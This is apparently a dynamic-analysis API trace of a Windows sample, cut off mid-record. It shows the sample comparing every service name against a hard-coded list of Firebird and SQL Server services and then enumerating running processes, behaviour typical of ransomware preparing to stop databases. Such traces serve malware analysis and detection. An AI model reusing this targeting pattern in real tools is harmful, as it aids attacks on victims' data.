lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0191.302] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0191.302] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0191.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0191.302] lstrlenW (lpString="Dnscache") returned 8 [0191.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0191.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0191.302] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0191.302] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0191.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0191.302] lstrlenW (lpString="DPS") returned 3 [0191.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0191.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0191.302] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0191.302] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0191.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0191.303] lstrlenW (lpString="DusmSvc") returned 7 [0191.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0191.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0191.303] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0191.303] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0191.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0191.303] lstrlenW (lpString="EventLog") returned 8 [0191.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0191.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0191.303] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0191.303] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0191.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0191.303] lstrlenW (lpString="EventSystem") returned 11 [0191.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0191.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0191.303] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0191.303] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0191.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0191.303] lstrlenW (lpString="FontCache") returned 9 [0191.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0191.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0191.303] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0191.303] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0191.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0191.303] lstrlenW (lpString="gpsvc") returned 5 [0191.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0191.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0191.303] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0191.303] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0191.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0191.304] lstrlenW (lpString="iphlpsvc") returned 8 [0191.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0191.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0191.304] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0191.304] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0191.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0191.304] lstrlenW (lpString="KeyIso") returned 6 [0191.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0191.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0191.304] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0191.304] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0191.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0191.304] lstrlenW (lpString="LanmanServer") returned 12 [0191.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0191.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0191.304] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0191.304] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0191.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0191.304] lstrlenW (lpString="LanmanWorkstation") returned 17 [0191.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0191.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0191.304] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0191.304] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0191.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0191.304] lstrlenW (lpString="lfsvc") returned 5 [0191.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0191.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0191.305] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0191.305] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0191.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0191.305] lstrlenW (lpString="lmhosts") returned 7 [0191.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0191.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0191.305] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0191.305] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0191.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0191.305] lstrlenW (lpString="LSM") returned 3 [0191.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0191.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0191.305] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0191.305] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0191.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0191.305] lstrlenW (lpString="MpsSvc") returned 6 [0191.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0191.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0191.305] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0191.305] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0191.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0191.305] lstrlenW (lpString="NcbService") returned 10 [0191.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0191.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0191.305] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0191.305] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0191.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0191.305] lstrlenW (lpString="netprofm") returned 8 [0191.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0191.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0191.306] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0191.306] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0191.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0191.306] lstrlenW (lpString="NgcSvc") returned 6 [0191.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0191.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0191.306] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0191.306] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0191.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0191.306] lstrlenW (lpString="NlaSvc") returned 6 [0191.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0191.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0191.306] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0191.306] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0191.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0191.306] lstrlenW (lpString="nsi") returned 3 [0191.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0191.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0191.306] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0191.306] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0191.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0191.306] lstrlenW (lpString="PcaSvc") returned 6 [0191.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0191.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0191.306] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0191.306] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0191.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0191.306] lstrlenW (lpString="PlugPlay") returned 8 [0191.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0191.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0191.306] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0191.307] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0191.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0191.307] lstrlenW (lpString="Power") returned 5 [0191.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0191.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0191.307] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0191.307] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0191.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0191.307] lstrlenW (lpString="ProfSvc") returned 7 [0191.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0191.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0191.307] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0191.307] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0191.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0191.307] lstrlenW (lpString="RpcEptMapper") returned 12 [0191.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0191.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0191.307] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0191.307] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0191.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0191.307] lstrlenW (lpString="RpcSs") returned 5 [0191.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0191.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0191.307] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0191.307] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0191.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0191.307] lstrlenW (lpString="SamSs") returned 5 [0191.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0191.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0191.307] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0191.308] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0191.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0191.308] lstrlenW (lpString="Schedule") returned 8 [0191.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0191.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0191.308] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0191.308] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0191.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0191.308] lstrlenW (lpString="SecurityHealthService") returned 21 [0191.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0191.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0191.308] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0191.308] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0191.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0191.308] lstrlenW (lpString="SENS") returned 4 [0191.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0191.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0191.308] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0191.308] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0191.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0191.308] lstrlenW (lpString="ShellHWDetection") returned 16 [0191.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0191.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0191.308] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0191.308] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0191.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0191.308] lstrlenW (lpString="Spooler") returned 7 [0191.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0191.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0191.309] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0191.309] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0191.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0191.309] lstrlenW (lpString="StateRepository") returned 15 [0191.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0191.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0191.309] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0191.309] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0191.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0191.309] lstrlenW (lpString="SysMain") returned 7 [0191.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0191.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0191.309] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0191.309] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0191.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0191.309] lstrlenW (lpString="SystemEventsBroker") returned 18 [0191.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0191.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0191.309] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0191.309] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0191.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0191.309] lstrlenW (lpString="Themes") returned 6 [0191.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0191.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0191.309] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0191.309] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0191.310] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0191.310] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0191.310] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0191.310] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0191.310] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0191.310] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0191.310] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x358 [0191.313] Process32FirstW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.314] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0191.315] lstrlenW (lpString="System") returned 6 [0191.315] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0191.316] lstrlenW (lpString="smss.exe") returned 8 [0191.316] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.317] lstrlenW (lpString="csrss.exe") returned 9 [0191.317] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0191.317] lstrlenW (lpString="wininit.exe") returned 11 [0191.317] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.318] lstrlenW (lpString="csrss.exe") returned 9 [0191.318] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0191.319] lstrlenW (lpString="winlogon.exe") returned 12 [0191.319] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0191.319] lstrlenW (lpString="services.exe") returned 12 [0191.319] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0191.320] lstrlenW (lpString="lsass.exe") returned 9 [0191.320] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0191.321] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0191.321] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0191.322] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0191.322] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.322] lstrlenW (lpString="svchost.exe") returned 11 [0191.322] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.323] lstrlenW (lpString="svchost.exe") returned 11 [0191.323] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0191.324] lstrlenW (lpString="dwm.exe") returned 7 [0191.324] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.325] lstrlenW (lpString="svchost.exe") returned 11 [0191.325] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.326] lstrlenW (lpString="svchost.exe") returned 11 [0191.326] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.326] lstrlenW (lpString="svchost.exe") returned 11 [0191.326] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.327] lstrlenW (lpString="svchost.exe") returned 11 [0191.327] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.328] lstrlenW (lpString="svchost.exe") returned 11 [0191.328] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.329] lstrlenW (lpString="svchost.exe") returned 11 [0191.329] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.330] lstrlenW (lpString="svchost.exe") returned 11 [0191.330] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.331] lstrlenW (lpString="svchost.exe") returned 11 [0191.331] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.332] lstrlenW (lpString="svchost.exe") returned 11 [0191.332] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.332] lstrlenW (lpString="svchost.exe") returned 11 [0191.332] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: 